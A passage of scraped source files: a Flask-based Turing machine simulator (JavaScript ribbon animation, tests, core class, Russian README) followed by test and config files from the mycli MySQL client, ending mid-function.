moves.length) {\n return;\n }\n\n ribbon.cells[middle].children[0].setAttribute('value', change_symbols[index]);\n executed.setAttribute('value', statuses[index]);\n\n let pos_input = document.getElementById('pos');\n makeMiddleCommonIndex();\n if (moves[index] === '<') {\n moveRibbonLeft();\n //pos_input.setAttribute('value', (parseInt(pos_input.getAttribute('value')) - 1).toString());\n } else if (moves[index] === '>') {\n moveRibbonRight();\n //pos_input.setAttribute('value', (parseInt(pos_input.getAttribute('value')) + 1).toString());\n }\n pos_input.setAttribute('value', (middle + parseInt(index_ribbon.cells[0].innerHTML)).toString());\n makeMiddleMainIndex();\n\n timerMakeNextStepId = setTimeout(function () {\n makeNextStep(moves, change_symbols, executed, statuses, index + 1);\n }, 250);\n}\n\nfunction drawAfterLoad() {\n let ribbon_data = JSON.parse(table.dataset.ribbon);\n let ribbon_extremum = JSON.parse(table.dataset.ribbon_extremum);\n\n drawRibbon(ribbon_data, ribbon_extremum);\n\n let executed = document.getElementById(\"status\");\n let moves = JSON.parse(executed.dataset.moves);\n let statuses = JSON.parse(executed.dataset.statuses);\n let pos = parseInt(executed.dataset.pos);\n let change_symbols = JSON.parse(executed.dataset.change_symbols);\n document.getElementById('pos').setAttribute('value', pos.toString());\n\n middle += pos;\n reallyMarginLeft -= pos * widthCell;\n table.style.marginLeft = reallyMarginLeft.toString() + 'px';\n\n makeNextStep(moves, change_symbols, executed, statuses, 0);\n}\n\nfunction drawRibbon(ribbon_data, ribbon_extremum) {\n for (let i = 0; i <= ribbon_extremum['max_index']; ++i) {\n let real_index = i - parseInt(index_ribbon.cells[0].innerHTML);\n if (i <= parseInt(index_ribbon.cells[ribbon.cells.length - 1].innerHTML)) {\n ribbon.cells[real_index].children[0].setAttribute('value', ribbon_data[i]);\n } else {\n addCell(real_index, i, ribbon_data[i]);\n }\n }\n\n for (let i = -1; i >= ribbon_extremum['min_index']; --i) {\n if (i >= parseInt(index_ribbon.cells[0].innerHTML)) {\n let real_index = i - parseInt(index_ribbon.cells[0].innerHTML);\n ribbon.cells[real_index].children[0].setAttribute('value', ribbon_data[i]);\n } else {\n addCell(0, i, ribbon_data[i]);\n ++middle;\n reallyMarginLeft -= widthCell;\n table.style.marginLeft = reallyMarginLeft.toString() + 'px';\n }\n }\n}\nfunction drawBorrow() {\n document.getElementById(\"borrow\").style.marginLeft =\n (middle * widthCell - widthCell * 0.4).toString() + 'px';\n document.getElementById(\"borrow\").style.marginTop = '-70px';\n document.getElementById(\"borrow\").style.color = 'red';\n}\n\nfunction makeMiddleCommonIndex() {\n index_ribbon.cells[middle].style.fontWeight = \"500\";\n index_ribbon.cells[middle].style.fontSize = \"15px\";\n}\nfunction makeMiddleMainIndex() {\n index_ribbon.cells[middle].style.fontWeight = \"700\";\n index_ribbon.cells[middle].style.fontSize = \"20px\";\n}\n\nfunction stopMakeNextStep() {\n clearTimeout(timerMakeNextStepId);\n}" }, { "alpha_fraction": 0.5352826714515686, "alphanum_fraction": 0.5559453964233398, "avg_line_length": 44.80356979370117, "blob_id": "0000abe287a519ec4af5b8c8969afde4df5db59d", "content_id": "a8bfe5c01ce8aae5af9173f3a0a2f6f73b7f2489", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2565, "license_type": "no_license", "max_line_length": 98, "num_lines": 56, "path": "/test_flask.py", "repo_name": "aleks311001/MachineTuring", "src_encoding": "UTF-8", "text": "import unittest\nimport app\nimport re\nimport json\n\n\ndef get_elem_from_data_html(name_dict, data):\n found_name_dict = re.findall(rf'{name_dict}' + r'=\"[a-zA-Z0-9_{};:#&\\[\\]=><,.\\- ]*\"', data)[0]\n return json.loads(found_name_dict.split(name_dict + '=\"')[1][0:-1].replace('&#34;', '\"'))\n\n\nclass TestFlask(unittest.TestCase):\n def setUp(self):\n self.app = app.app.test_client()\n\n def test_default_page(self):\n response = self.app.get('/')\n assert response.status_code == 200\n\n data = response.data.decode('utf-8')\n assert 'value=\"_\"' in data # alphabet\n assert 'value=\"Q0\"' in data # status_alphabet\n assert set(get_elem_from_data_html('data-ribbon', data).values()) == set('_')\n assert get_elem_from_data_html('data-statuses', data) == ['Q0', ]\n assert get_elem_from_data_html('data-moves', data) == ['=', ]\n assert get_elem_from_data_html('data-change_symbols', data) == ['_', ]\n\n def test_start(self):\n response = self.app.post('/start', data={\n 'alphabet': '_1', 'status_alphabet': 'Q0 Qt',\n 'ribbon~0': '_', 'ribbon~1': '_', 'ribbon~-1': '_',\n 'input~_~Q0': '1>Qt', 'input~_~Q1': '', 'input~1~Q0': '', 'input~1~Qt': '',\n 'pos': 0, 'status': 'Q0', 'steps': 1\n }, follow_redirects=True)\n assert response.status_code == 200\n\n data = response.data.decode('utf-8')\n assert 'value=\"_1\"' in data # alphabet\n assert 'value=\"Q0 Qt\"' in data # status_alphabet\n assert set(get_elem_from_data_html('data-ribbon', data).values()) == {'0', '1', '_'}\n assert get_elem_from_data_html('data-statuses', data) == ['Qt', ]\n assert get_elem_from_data_html('data-moves', data) == [\"&gt;\", ] # '&gt;' = '>'\n assert get_elem_from_data_html('data-change_symbols', data) == ['1', ]\n\n def test_load(self):\n response = self.app.post('/load', data={'save-load': 'add1'}, follow_redirects=True)\n assert response.status_code == 200\n\n data = response.data.decode('utf-8')\n assert 'value=\"_01\"' in data # alphabet\n assert 'value=\"Q0 Q1 Q2 Qt\"' in data # status_alphabet\n assert get_elem_from_data_html('data-ribbon', data)['1'] == '1'\n assert get_elem_from_data_html('data-ribbon', data)['2'] == '0'\n assert get_elem_from_data_html('data-statuses', data) == ['Q0', ]\n assert get_elem_from_data_html('data-moves', data) == [\"=\", ]\n assert get_elem_from_data_html('data-change_symbols', data) == ['1', ]\n" }, { "alpha_fraction": 0.5500235557556152, "alphanum_fraction": 0.5537930130958557, "avg_line_length": 33.04813003540039, "blob_id": "eb2756090026db32ab613e4bfdc15f20849c2357", "content_id": "72fd449e84332f905e32e2cfc90ec3d46f54bb02", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6368, "license_type": "no_license", "max_line_length": 114, "num_lines": 187, "path": "/machine_Turing.py", "repo_name": "aleks311001/MachineTuring", "src_encoding": "UTF-8", "text": "import math\n\nfrom flask import Flask, jsonify, request, redirect, send_from_directory, render_template\nfrom dataclasses import dataclass\nimport json\nimport re\n\n\n@dataclass\nclass Cell:\n input_text: str = ''\n output_text: str = ''\n execution_count: int = 0\n\n\nclass MachineTuring:\n _HTML_TEMPLATE_PATH = \"machine.html\"\n\n def __init__(self):\n self._alphabet = '_'\n self._status_alphabet = ['Q0', ]\n self._program_table = {'_': {'Q0': ''}}\n self._ribbon = {'0': '_'}\n self._ribbon_extremum = {'min_index': 0, 'max_index': 0}\n self._status = 'Q0'\n self._pos_ribbon = 0\n self._move = '='\n\n self._moves = [self._move, ]\n self._pos_start = self._pos_ribbon\n self._change_symbols = [self._ribbon[str(self._pos_start)], ]\n self._statuses = [self._status, ]\n self._before_ribbon = self._ribbon\n\n def clear(self):\n self.__init__()\n\n def clear_story(self):\n self._moves = [\"=\", ]\n self._pos_start = self._pos_ribbon\n self._change_symbols = [self._ribbon[str(self._pos_start)], ]\n self._statuses = [self._status, ]\n self._before_ribbon = self._ribbon\n\n def create_dict(self):\n result = dict(alphabet=self._alphabet, status_alphabet=' '.join(self._status_alphabet),\n program_table=self.make_program_table(), ribbon_cells=json.dumps(self._before_ribbon),\n ribbon_extremum=json.dumps(self._ribbon_extremum),\n pos_start=self._pos_start, moves=json.dumps(self._moves),\n change_symbols=json.dumps(self._change_symbols), statuses=json.dumps(self._statuses))\n\n self.clear_story()\n return result\n\n def render(self):\n return render_template(self._HTML_TEMPLATE_PATH, **self.create_dict())\n\n def make_program_table(self):\n result = dict()\n result['line_status'] = self._status_alphabet\n\n result['lines'] = dict()\n for symbol in self._alphabet:\n line = dict()\n\n line['symbol'] = symbol\n if symbol == ' ':\n line['symbol'] = '˽'\n\n line['cells'] = dict()\n for status in self._status_alphabet:\n line['cells'][status] = self._program_table[symbol][status]\n line['index_cells'] = self._status_alphabet\n\n result['lines'][symbol] = line\n\n result['index_lines'] = self._alphabet\n\n return result\n\n def update_alphabet(self):\n new_alphabet = request.form.get('alphabet')\n\n for symbol in set(new_alphabet) ^ set(self._alphabet):\n if symbol not in self._program_table:\n self._program_table[symbol] = dict()\n for status in self._status_alphabet:\n self._program_table[symbol][status] = ''\n else:\n self._program_table.pop(symbol)\n\n self._alphabet = new_alphabet\n\n def update_status_alphabet(self):\n new_status_alphabet = str(request.form.get('status_alphabet')).split(' ')\n\n for symbol in self._program_table:\n for status in set(new_status_alphabet) ^ set(self._status_alphabet):\n if status in self._status_alphabet:\n self._program_table[symbol].pop(status)\n else:\n self._program_table[symbol][status] = ''\n\n self._status_alphabet = new_status_alphabet\n\n def load_program_table_and_ribbon(self):\n self._status = request.form.get('status')\n self._pos_ribbon = int(request.form.get('pos'))\n\n for item in request.form:\n name = item.split('~')\n if name[0] == 'ribbon':\n index = name[1]\n self._ribbon[index] = request.form.get(item)\n elif name[0] == 'input':\n self._program_table[name[1]][name[2]] = request.form.get(item)\n\n self._ribbon_extremum['min_index'] = min(int(i) for i in self._ribbon.keys())\n self._ribbon_extremum['max_index'] = max(int(i) for i in self._ribbon.keys())\n\n def update_all(self):\n self.update_alphabet()\n self.update_status_alphabet()\n self.load_program_table_and_ribbon()\n self.clear_story()\n\n def start(self, steps):\n self._before_ribbon = self._ribbon.copy()\n self._moves = list()\n self._pos_start = self._pos_ribbon\n self._change_symbols = list()\n self._statuses = list()\n\n last_pos = self._pos_ribbon\n step = 0\n while step < steps and self.next_step():\n self._moves.append(self._move)\n self._change_symbols.append(self._ribbon[str(last_pos)])\n self._statuses.append(self._status)\n last_pos = self._pos_ribbon\n step += 1\n\n def next_step(self):\n program = self._program_table[self._ribbon[str(self._pos_ribbon)] or ' '][self._status]\n move = re.findall(r'[<=>]', program)\n if len(move) == 0:\n return False\n else:\n self._move = move[0]\n\n self._ribbon[str(self._pos_ribbon)] = program.split(self._move)[0]\n self._status = program.split(self._move)[1]\n\n self.check_not_extremum_cell()\n\n if self._status not in self._status_alphabet or self._ribbon[str(self._pos_ribbon)] not in self._alphabet:\n return False\n\n if self._move == '<':\n self._pos_ribbon -= 1\n elif self._move == '>':\n self._pos_ribbon += 1\n\n return True\n\n def check_not_extremum_cell(self):\n if self._pos_ribbon == self._ribbon_extremum['max_index']:\n self._ribbon_extremum['max_index'] += 1\n self._ribbon[str(self._ribbon_extremum['max_index'])] = '_'\n if self._pos_ribbon == self._ribbon_extremum['min_index']:\n self._ribbon_extremum['min_index'] -= 1\n self._ribbon[str(self._ribbon_extremum['min_index'])] = '_'\n\n def save(self, name):\n filename = 'machines/' + name + '.json'\n\n with open(filename, 'w') as file:\n json.dump(self.__dict__, file, indent=4)\n\n def load(self, name):\n filename = 'machines/' + name + '.json'\n\n with open(filename, 'r') as file:\n machine = dict(json.load(file))\n\n for key in machine.keys():\n self.__setattr__(key, machine[key])\n" }, { "alpha_fraction": 0.7571574449539185, "alphanum_fraction": 0.7632924318313599, "avg_line_length": 68.89286041259766, "blob_id": "183eb13726977b0633391cdb95455236d22d2180", "content_id": "895e31c14f47da871b7b801de3c184186d559816", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3379, "license_type": "no_license", "max_line_length": 107, "num_lines": 28, "path": "/README.md", "repo_name": "aleks311001/MachineTuring", "src_encoding": "UTF-8", "text": "# Машина Тьюринга\n\nДля запуска сервера используйте: \"_python3 app.py_\", для запуска тестов: \"_pytest_\"\n\nОткрыв машину Тьюринга, вы увидите несколько полей:\n\n1. **Алфавит символов.** Это множество символов, которые могут быть напечатаны на ленте \n(символы этого алфавита должны быть односимвольными и их надо вписывать без пробелов,\nтакже здесь запрещены служебные символы: \"<\", \"=\", \">\", \"~\");\n2. **Алфавит состояний.** Это множество состояний машины (они могут быть многосимвольными и их \nнеобходимо указывать через пробел, здесь также запрещены слова, содержащие служебные символы).\nДля обновления таблицы из 6 пункта в соотвествии с алфавитами, надо нажать \"Update\";\n3. **Лента машины.** Это бесконечная в обе стороны лента, с которой и работает машина Тьюринга\n(перемещаться по ней можно стрелками, либо же просто кликать мышкой по нужной клетке);\n4. **Два поля с текущим состоянием и позицией;**\n5. **Поле с количеством шагов.** Машина остановится, если не перейдет в завершающее состояние \nчерез столько шагов после старта. Также здесь присуствует три кнопки: \n - \"Start\" - запустить машину на указанное количество шагов;\n - \"Next step\" - сделать 1 шаг (эквивалентно Start 1);\n - \"Stop\" - принудительно остановить машину;\n6. **Таблица для программирования машины.** Здесь надо для каждой пары (символ на ленте, состояние) \nуказать, что должна сделать машина в таком формате: <новый символ, на который заменится текущий><напрвление\nдвижения машины: \"<\" - влево, \"=\" - остаться на месте, \">\" - вправо><новое состояние после перемещения>. \nЕсли оставить поле пустым, машина остановится при попадании а него (таким образом можно делать завершающие\nсостояния - пустой столбец)\n7. **Поле с именем машины**. Здесь вы можете ввести имя своей машины, чтобы ее сохранить (\"Save\") или же \nзагрузить (\"Load\") (также можно загрузить несколько примеров, названия которых указаны под этим полем);\n8. **Кнопка \"Clear\".** Кнопка для очистки введенных данных." } ]
6
venice84/rpi-dashboard
https://github.com/venice84/rpi-dashboard
d1ff5580ab3ca87d0024742cfa26b3b2e4580cb8
f92bcba5d86cb8b5f6716ef0e9df36c02dbdf5c5
529be620055b333f91d75f8a24b1e2a6af6a11da
refs/heads/master
2022-04-16T10:37:29.578445
2020-04-13T19:25:57
2020-04-13T19:25:57
255,413,703
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5142378807067871, "alphanum_fraction": 0.589614748954773, "avg_line_length": 58.70000076293945, "blob_id": "9ff940f2b34434706ce90d90fe193e34f42251ce", "content_id": "8fe4511f305176c6ab35f55ed5475892993eb675", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 597, "license_type": "no_license", "max_line_length": 84, "num_lines": 10, "path": "/start_sensoriraspberry.sh", "repo_name": "venice84/rpi-dashboard", "src_encoding": "UTF-8", "text": "#!/bin/bash\nraspcpu=$(top -bn 2 -d 0.01 | grep 'Cpu(s)' | tail -n 1 | awk '{print $2+$4+$6}')\nuptime=$(uptime | awk '{print int($3+$5/1440),\"giorni\"}')\ndisco_occ=$(df -h | grep /dev/root | awk '{print $5}')\nram_occ=$(free -m | awk 'FNR == 2 {print int($3/$2*100)}')\n\nmosquitto_pub -h 192.168.x.x -m \"$raspcpu\" -t raspcpu -u 'user' -P 'password' -r\nmosquitto_pub -h 192.168.x.x -m \"$uptime\" -t uptime -u 'user' -P 'password' -r\nmosquitto_pub -h 192.168.x.x -m \"$disco_occ\" -t disco_occ -u 'user' -P 'password' -r\nmosquitto_pub -h 192.168.x.x -m \"$ram_occ\" -t ram_occ -u 'user' -P 'password' -r\n" }, { "alpha_fraction": 0.8043912053108215, "alphanum_fraction": 0.8078842163085938, "avg_line_length": 57.764705657958984, "blob_id": "1c9b8a698f8aebc102eed4a8320ef957885d72f8", "content_id": "89d4b260387d37eb7714beee17994936ed71b0ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2016, "license_type": "no_license", "max_line_length": 353, "num_lines": 34, "path": "/README.md", "repo_name": "venice84/rpi-dashboard", "src_encoding": "UTF-8", "text": "# rpi-dashboard\n\nDevo fare una premessa: non sono un programmatore e questo launcher è stato creato come passatempo. ;)\nSono sicuro che non sarà elegante o ottimizzato, ma fa esattamente quello che cercavo.\n\nL'obbiettivo era quello di utilizzare il mio raspberry con display osoyoo 3.5\", in modo da poter visualizzare\ndelle schede in continuo aggiornamento. Potevo farlo con homeassistant e la sua pagina web, ma chromium funziona veramente male su un display di piccole dimensioni, e le prestazioni sono scarse. Con un futuro display da 7 pollici potrò pensare ad una interfaccia con pulsanti e molte più etichette. Il tema dark è necessario per una migliore visibilità.\n\nIl programma attualmente pubblicato ha bisogno di:\n\n- mqtt server installato come docker container (o installato direttamente nel raspberry);\n- mqtt client installato (sudo apt-get install mosquitto-clients)\n- cron per aggiornare i valori mqtt a intervalli regolari\n- python per creare la maschera con tkinter e paho mqtt\n\nE' compatibile con Python v2.x e 3.x (qualche piccola modifica), mentre sono necessari i moduli :\n\npip3 install setuptools\npip3 install paho-mqtt \n\nOgni minuto il raspberry esegue, con crontab:\n\n/bin/sh /start_sensoriraspberry.sh\n\nL'idea è in continua evoluzione: ora punterò ad integrarlo con homeassistant per creare un pannello di comando casalingo non basato su web, per i motivi già indicati in precedenza.\n\nLe schede che vedete sono di esempio, tramite mqtt si può inserire qualsiasi risultato proveniente da riga di comando:\n\n- sensori raspberry, \n- dati provenienti da siti internet usando curl, \n- sensori mqtt da dispositivi tasmota\n- altri sensori utilizzando homeassistant come piattaforma principale (raccoglie al suo interno una infinità di plugins), e tramite la sua configurazione pubblicare topics su mqtt.\n\nDato che utilizzo regolarmente Homeassistant per la domotica casalinga, mi piacerebbe integrare questo launcher con alcuni sensori già presenti in home assistant, tramite mqtt.\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.639104425907135, "alphanum_fraction": 0.6597206592559814, "avg_line_length": 34.67479705810547, "blob_id": "795eb13613047ac5fbb8a17e8862094b84471f9e", "content_id": "d5a25604cd8a941e899c2bfcea45585549c00cf8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4511, "license_type": "no_license", "max_line_length": 150, "num_lines": 123, "path": "/launcher4.0.0.py", "repo_name": "venice84/rpi-dashboard", "src_encoding": "UTF-8", "text": "from tkinter import * #Tkinter for python 2x\r\nimport time # reads the time\r\nimport locale # time conversion\r\nimport logging # for logging\r\nimport threading # multi processes\r\nfrom threading import Thread\r\nimport subprocess\r\nfrom uptime import *\r\nimport paho.mqtt.client as mqtt\r\n\r\n#start window\r\nroot = Tk() #call root window\r\n\r\n#initialise var\r\nup=''\r\ntime1=''\r\n\r\n#log error\r\n#logging.basicConfig(filename='launcher.log', level=logging.DEBUG, format='%(asctime)s %(levelname)s %(name)s %(message)s')\r\n#logger=logging.getLogger(__name__)\r\n\r\n##chiudi = PhotoImage(file=\"chiudi.png\") #PER METTERE IMMAGINE\r\nchiudi ='CHIUDI'\r\n\r\n#def window and locales\r\nlocale.setlocale(locale.LC_ALL, '') # translation months in correct utc format\r\n\r\n#-------------------------TESTING WINDOW PARAMETERS----------------------------\r\n#w, h = root.winfo_screenwidth(), root.winfo_screenheight()\r\nroot.geometry(\"450x400+300+300\")\r\n#root.geometry('%sx%s' % (w, h))\r\n#root.attributes(\"-fullscreen\", True) #fullscreen\r\n#---------------------------------------------------------------------------\r\n\r\nroot.bind('<Escape>',lambda e: root.destroy()) # destroy main window with esc\r\nroot.configure(background='black') # black wallpaper\r\nroot.config(cursor=\"none\") # no mouse pointer\r\n\r\n################ MAIN WINDOW LEVEL ################\r\n\r\n\r\nlabel_clock = Label(root, font=('DejaVu Sans', 100, 'bold'), fg='white',bg='black')\r\nlabel_clock.grid(row=0, columnspan=3)\r\n\r\nlabel_date = Label(root, font=('DejaVu Sans', 25), fg='white',bg='black')\r\nlabel_date.grid(row=1,columnspan=3)\r\n\r\nbutton_chiudi = Button(root, font=('DejaVu Sans', 8), borderwidth=1, fg='white',bg='black',relief=\"solid\", text='v. 4.0 exit', command = root.destroy)\r\nbutton_chiudi.grid(row=2,columnspan=3)\r\n\r\nlabel_info0 = Label(root, font=('DejaVu Sans', 30), fg='white',bg='black', borderwidth=1, relief=\"solid\", text=\"cpu\")\r\nlabel_info0.grid(row=3, column=0)\r\n\r\nlabel_info1 = Label(root, font=('DejaVu Sans', 30), fg='white',bg='black', borderwidth=1, relief=\"solid\", text=\"uptime\")\r\nlabel_info1.grid(row=3,column=1)\r\n\r\nlabel_info2= Label(root, font=('DejaVu Sans', 30), fg='white',bg='black', borderwidth=1, relief=\"solid\", text=\"disk\")\r\nlabel_info2.grid(row=4, column=0)\r\n\r\nlabel_info3 = Label(root, font=('DejaVu Sans', 30), fg='white',bg='black', borderwidth=1, relief=\"solid\", text=\"domani\")\r\nlabel_info3.grid(row=4,column=1)\r\n\r\n#MQTT UPDATE CPU per visualizzare i messaggi mqtt \r\ndef on_message_raspcpu(client, userdata, message):\r\n cpu='freq '+str(message.payload.decode(\"utf-8\")+'%')\r\n label_info0.config(text=cpu)\r\n\r\n#MQTT UPDATE DISK USAGE per visualizzare i messaggi mqtt\r\ndef on_message_disco_occ(client, userdata, message):\r\n disk='disk '+str(message.payload.decode(\"utf-8\"))\r\n label_info2.config(text=disk)\r\n\r\n#MQTT RAM USAGE per visualizzare i messaggi mqtt\r\ndef on_message_ram_occ(client, userdata, message):\r\n ram='ram '+str(message.payload.decode(\"utf-8\")+'%')\r\n label_info3.config(text=ram)\r\n \r\n#MQTT DEFAULT settings\r\nbroker_address=\"192.168.x.x\"\r\nuser = \"user\"\r\npassword = \"password\"\r\nclient = mqtt.Client(\"Python\") #create new instance\r\nclient.username_pw_set(user, password=password)\r\n\r\n#MQTT DEFINE TOPICS ogni lettura va in un callback differente in base al topic (anche se ascolto tutto)\r\nclient.message_callback_add('raspcpu', on_message_raspcpu)\r\nclient.message_callback_add('disco_occ', on_message_disco_occ)\r\nclient.message_callback_add('ram_occ', on_message_ram_occ)\r\nclient.connect(broker_address) #connect to broker per far comparire i messaggi\r\nclient.loop_start()\r\n\r\n#ascolto tutto - posso anche filtrare solo una sotto categoria\r\nclient.subscribe(\"#\")\r\n\r\n##########processo numero 2 - aggiorna l'uptime##########\r\ndef update_uptime():\r\n up=' upt '+str(round(uptime()/86400,2))+'gg'\r\n label_info1.config(text=up)\r\n #print(time.strftime('%S')) #x check\r\n root.after(6000, update_uptime) #crea il loop\r\n\r\n\r\n##########processo numero 1 - aggiorna l'orario##########\r\ndef update_time():\r\n global time1\r\n ora_ora = time.strftime('%H:%M')\r\n data_ora = time.strftime('%d %B %Y', time.localtime())\r\n \r\n label_clock.config(text=ora_ora)\r\n label_date.config(text=data_ora)\r\n #print(time.strftime('%S')) #x check\r\n root.after(6000, update_time) #crea il loop\r\n\r\n\r\n#multiprocessing\r\nif __name__ == '__main__':\r\n T1=Thread(target = update_time)\r\n T2=Thread(target = update_uptime)\r\n T1.setDaemon(True)\r\n T2.setDaemon(True)\r\n T1.start()\r\n T2.start()\r\nroot.mainloop()\r\n" } ]
3
kongzhidea/mycli
https://github.com/kongzhidea/mycli
5796d58b6ce28b9feb4c52b8d7df10d5c54933f2
f8045fef05b7b701014a7f82f08e49d11bf92b40
5e127f70e9851e88aeb2b96c5cd5e3aed5d2e37a
refs/heads/master
2020-12-31T07:10:48.737969
2018-11-27T11:38:39
2018-11-27T11:38:39
86,579,644
1
0
NOASSERTION
2017-03-29T12:30:44
2017-03-29T12:30:46
2018-11-27T11:38:40
Python
[ { "alpha_fraction": 0.6315270662307739, "alphanum_fraction": 0.6371921300888062, "avg_line_length": 28, "blob_id": "d241355f0da984a30e60b245935d35d477e3ce3b", "content_id": "81a9ee4f7524f39b3767cfd52fcdaab099a91b01", "detected_licenses": [ "MIT", "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4060, "license_type": "permissive", "max_line_length": 78, "num_lines": 140, "path": "/test/test_config.py", "repo_name": "kongzhidea/mycli", "src_encoding": "UTF-8", "text": "\"\"\"Unit tests for the mycli.config module.\"\"\"\nfrom io import BytesIO, TextIOWrapper\nimport os\nimport struct\nimport sys\nimport tempfile\nimport pytest\n\nfrom mycli.config import (get_mylogin_cnf_path, open_mylogin_cnf,\n read_and_decrypt_mylogin_cnf, str_to_bool)\n\nLOGIN_PATH_FILE = os.path.abspath(os.path.join(os.path.dirname(__file__),\n 'mylogin.cnf'))\n\n\ndef open_bmylogin_cnf(name):\n \"\"\"Open contents of *name* in a BytesIO buffer.\"\"\"\n with open(name, 'rb') as f:\n buf = BytesIO()\n buf.write(f.read())\n return buf\n\n\ndef test_read_mylogin_cnf():\n \"\"\"Tests that a login path file can be read and decrypted.\"\"\"\n mylogin_cnf = open_mylogin_cnf(LOGIN_PATH_FILE)\n\n assert isinstance(mylogin_cnf, TextIOWrapper)\n\n contents = mylogin_cnf.read()\n for word in ('[test]', 'user', 'password', 'host', 'port'):\n assert word in contents\n\n\ndef test_decrypt_blank_mylogin_cnf():\n \"\"\"Test that a blank login path file is handled correctly.\"\"\"\n mylogin_cnf = read_and_decrypt_mylogin_cnf(BytesIO())\n assert mylogin_cnf is None\n\n\ndef test_corrupted_login_key():\n \"\"\"Test that a corrupted login path key is handled correctly.\"\"\"\n buf = open_bmylogin_cnf(LOGIN_PATH_FILE)\n\n # Skip past the unused bytes\n buf.seek(4)\n\n # Write null bytes over half the login key\n buf.write(b'\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0')\n\n buf.seek(0)\n mylogin_cnf = read_and_decrypt_mylogin_cnf(buf)\n\n assert mylogin_cnf is None\n\n\ndef test_corrupted_pad():\n \"\"\"Tests that a login path file with a corrupted pad is partially read.\"\"\"\n buf = open_bmylogin_cnf(LOGIN_PATH_FILE)\n\n # Skip past the login key\n buf.seek(24)\n\n # Skip option group\n len_buf = buf.read(4)\n cipher_len, = struct.unpack(\"<i\", len_buf)\n buf.read(cipher_len)\n\n # Corrupt the pad for the user line\n len_buf = buf.read(4)\n cipher_len, = struct.unpack(\"<i\", len_buf)\n buf.read(cipher_len - 1)\n buf.write(b'\\0')\n\n buf.seek(0)\n mylogin_cnf = TextIOWrapper(read_and_decrypt_mylogin_cnf(buf))\n contents = mylogin_cnf.read()\n for word in ('[test]', 'password', 'host', 'port'):\n assert word in contents\n assert 'user' not in contents\n\n\ndef test_get_mylogin_cnf_path():\n \"\"\"Tests that the path for .mylogin.cnf is detected.\"\"\"\n original_env = None\n if 'MYSQL_TEST_LOGIN_FILE' in os.environ:\n original_env = os.environ.pop('MYSQL_TEST_LOGIN_FILE')\n is_windows = sys.platform == 'win32'\n\n login_cnf_path = get_mylogin_cnf_path()\n\n if original_env is not None:\n os.environ['MYSQL_TEST_LOGIN_FILE'] = original_env\n\n if login_cnf_path is not None:\n assert login_cnf_path.endswith('.mylogin.cnf')\n\n if is_windows is True:\n assert 'MySQL' in login_cnf_path\n else:\n home_dir = os.path.expanduser('~')\n assert login_cnf_path.startswith(home_dir)\n\n\ndef test_alternate_get_mylogin_cnf_path():\n \"\"\"Tests that the alternate path for .mylogin.cnf is detected.\"\"\"\n original_env = None\n if 'MYSQL_TEST_LOGIN_FILE' in os.environ:\n original_env = os.environ.pop('MYSQL_TEST_LOGIN_FILE')\n\n _, temp_path = tempfile.mkstemp()\n os.environ['MYSQL_TEST_LOGIN_FILE'] = temp_path\n\n login_cnf_path = get_mylogin_cnf_path()\n\n if original_env is not None:\n os.environ['MYSQL_TEST_LOGIN_FILE'] = original_env\n\n assert temp_path == login_cnf_path\n\n\ndef test_str_to_bool():\n \"\"\"Tests that str_to_bool function converts values correctly.\"\"\"\n\n assert str_to_bool(False) is False\n assert str_to_bool(True) is True\n assert str_to_bool('False') is False\n assert str_to_bool('True') is True\n assert str_to_bool('TRUE') is True\n assert str_to_bool('1') is True\n assert str_to_bool('0') is False\n assert str_to_bool('on') is True\n assert str_to_bool('off') is False\n assert str_to_bool('off') is False\n\n with pytest.raises(ValueError):\n str_to_bool('foo')\n\n with pytest.raises(TypeError):\n str_to_bool(None)\n" }, { "alpha_fraction": 0.7116788029670715, "alphanum_fraction": 0.7116788029670715, "avg_line_length": 21.83333396911621, "blob_id": "3856871b5247d825f13bb90a3544a522e6bb4d61", "content_id": "261bee6e1e24ebb401fa6d779ddd6c85bfafc5c1", "detected_licenses": [ "MIT", "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 274, "license_type": "permissive", "max_line_length": 72, "num_lines": 12, "path": "/test/myclirc", "repo_name": "kongzhidea/mycli", "src_encoding": "UTF-8", "text": "# vi: ft=dosini\n\n# This file is loaded after mycli/myclirc and should override only those\n# variables needed for testing.\n# To see what every variable does see mycli/myclirc\n\n[main]\n\nlog_file = ~/.mycli.test.log\nlog_level = DEBUG\nprompt = '\\t \\u@\\h:\\d> '\nless_chatty = True\n" }, { "alpha_fraction": 0.5318312048912048, "alphanum_fraction": 0.5371959805488586, "avg_line_length": 28.43157958984375, "blob_id": "cf7d1e82621b000f0fbcceb796d76685b9d1af0b", "content_id": "5dfd3800f1a77d909f86bc58524cb131f062d821", "detected_licenses": [ "MIT", "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2796, "license_type": "permissive", "max_line_length": 75, "num_lines": 95, "path": "/test/features/steps/wrappers.py", "repo_name": "kongzhidea/mycli", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8\nfrom __future__ import unicode_literals\n\nimport re\nimport pexpect\nimport sys\nimport textwrap\n\ntry:\n from StringIO import StringIO\nexcept ImportError:\n from io import StringIO\n\n\ndef expect_exact(context, expected, timeout):\n timedout = False\n try:\n context.cli.expect_exact(expected, timeout=timeout)\n except pexpect.exceptions.TIMEOUT:\n timedout = True\n if timedout:\n # Strip color codes out of the output.\n actual = re.sub(r'\\x1b\\[([0-9A-Za-z;?])+[m|K]?',\n '', context.cli.before)\n raise Exception(\n textwrap.dedent('''\\\n Expected:\n ---\n {0!r}\n ---\n Actual:\n ---\n {1!r}\n ---\n Full log:\n ---\n {2!r}\n ---\n ''').format(\n expected,\n actual,\n context.logfile.getvalue()\n )\n )\n\n\ndef expect_pager(context, expected, timeout):\n expect_exact(context, \"{0}\\r\\n{1}{0}\\r\\n\".format(\n context.conf['pager_boundary'], expected), timeout=timeout)\n\n\ndef run_cli(context, run_args=None):\n \"\"\"Run the 